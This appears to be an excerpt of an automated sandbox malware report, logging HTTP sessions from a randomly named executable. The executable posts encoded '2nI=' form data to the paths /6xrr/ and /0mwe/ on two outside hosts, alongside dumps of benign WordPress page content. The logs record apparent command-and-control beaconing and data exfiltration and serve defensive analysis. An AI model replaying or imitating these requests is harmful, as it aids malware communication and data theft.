Jan 10, 2025 22:49:39.585722923 CET	724	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 10, 2025 22:49:39.585757017 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 10, 2025 22:49:39.585791111 CET	1236	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
Jan 10, 2025 22:49:39.585824013 CET	1236	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jan 10, 2025 22:49:39.585860968 CET	672	IN	Data Raw: 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 Data Ascii: 0,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65
Jan 10, 2025 22:49:39.585900068 CET	1236	IN	Data Raw: 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d Data Ascii: nt-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset
Jan 10, 2025 22:49:39.590845108 CET	1236	IN	Data Raw: 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b Data Ascii: or{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	65506	134.0.14.158	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:41.324131012 CET	1669	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 54 58 48 45 7a 49 4b 6c 42 78 35 64 79 33 46 79 75 79 34 35 6a 6f 45 4d 55 7a 71 32 59 75 43 6d 31 61 6d 4d 65 70 67 32 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 73 4d 4b 33 36 53 4a 64 34 53 52 41 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 78 74 35 4c [TRUNCATED] Data Ascii: 2nI=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJTXHEzIKlBx5dy3Fyuy45joEMUzq2YuCm1amMepg2iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIsMK36SJd4SRARE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHjYCJAV5SoDZUh4TfcvVOivTBXppFuxK/jigPfTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHBNpk5+JcZ7s0RSpCEIWgCKtS4zPw4i8lI1phaALXd11PUholXDs4LG6zdGiBsHreppqE8igrNvZuhbmjFDY3SNxrzvdDQWUSUav2+/Y/qdozslRzFzI0dzLaJsg3kp5qp16nzdM7V+AGC2samdriFyFuqzB6HIiIiFjsGKDrlBPbDYJz968u7BMGx+EiqbYMDg4VZK5irbrHPUNTqIpxVtcWSJNMxIl6Da8+hxsngAhQf7T9MLYXZVKphVKmSU6lP+/0ytZtlroqcJ4S4wLW825hDq4Nge7ydjIXC6a932F+DnUUW5BHvsUSaB0tnOvPzcRIvf6HsjOe4nTXqgtU5fU7AU/LtlVfhTZaAX5lUaJ6wKF7M3RPk1a1BEmszAcdf6NA5rbnoODOvdPMde9WBnjuLFJjKt2GhqXxEBSKBL/XIbq1rNZqYcSkVYsoZuw+/35KGlKZyRoJ74xBEK6Etjp2tYCCKpm26DBaSQUBOilCjFq3sDRBuIHSBHaM7tkcPe0cBj/B1pSnumfzRb [TRUNCATED]
Jan 10, 2025 22:49:42.191343069 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 21:49:41 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 10, 2025 22:49:42.191363096 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 10, 2025 22:49:42.191371918 CET	448	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 10, 2025 22:49:42.191404104 CET	1236	IN	Data Raw: 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 Data Ascii: {e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageDa
Jan 10, 2025 22:49:42.191461086 CET	1236	IN	Data Raw: 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 Data Ascii: peof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
Jan 10, 2025 22:49:42.191476107 CET	276	IN	Data Raw: 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 Data Ascii: {n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemoji
Jan 10, 2025 22:49:42.191529036 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 10, 2025 22:49:42.191559076 CET	224	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href=
Jan 10, 2025 22:49:42.191564083 CET	1236	IN	Data Raw: 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 67 6f 72 69 2d 70 64 66 2d 76 69 65 77 65 72 2f 64 69 73 74 2f 62 6c 6f 63 6b 73 2e 73 74 79 6c 65 2e 62 75 69 6c 64 Data Ascii: 'http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.style.build.css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background
Jan 10, 2025 22:49:42.191584110 CET	224	IN	Data Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 Data Ascii: preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--grad
Jan 10, 2025 22:49:42.196305990 CET	1236	IN	Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	65507	134.0.14.158	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:44.007637024 CET	371	OUT	GET /6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.aballanet.cat User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:49:44.803730011 CET	499	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 21:49:44 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://aballanet.cat/6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	65508	103.224.182.242	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:50.148863077 CET	623	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 56 4d 4b 71 73 68 6e 59 56 43 43 79 58 72 50 52 78 47 72 48 41 78 55 52 48 6e 39 5a 38 65 4f 6a 51 6b 59 6a 6f 73 3d Data Ascii: 2nI=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UVMKqshnYVCCyXrPRxGrHAxURHn9Z8eOjQkYjos=
Jan 10, 2025 22:49:50.802432060 CET	871	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 21:49:50 GMT server: Apache set-cookie: __tad=1736545790.2606223; expires=Mon, 08-Jan-2035 21:49:50 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	65509	103.224.182.242	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:52.702723980 CET	643	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 5a 2f 52 45 50 4c 63 4c 44 6d 35 7a 30 6f 39 2f 37 4e 49 4a 66 4a 34 4f 54 47 38 4b 7a 49 42 69 67 32 30 59 6c 4e Data Ascii: 2nI=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZ/REPLcLDm5z0o9/7NIJfJ4OTG8KzIBig20YlN
Jan 10, 2025 22:49:53.366782904 CET	871	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 21:49:53 GMT server: Apache set-cookie: __tad=1736545793.8644198; expires=Mon, 08-Jan-2035 21:49:53 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: 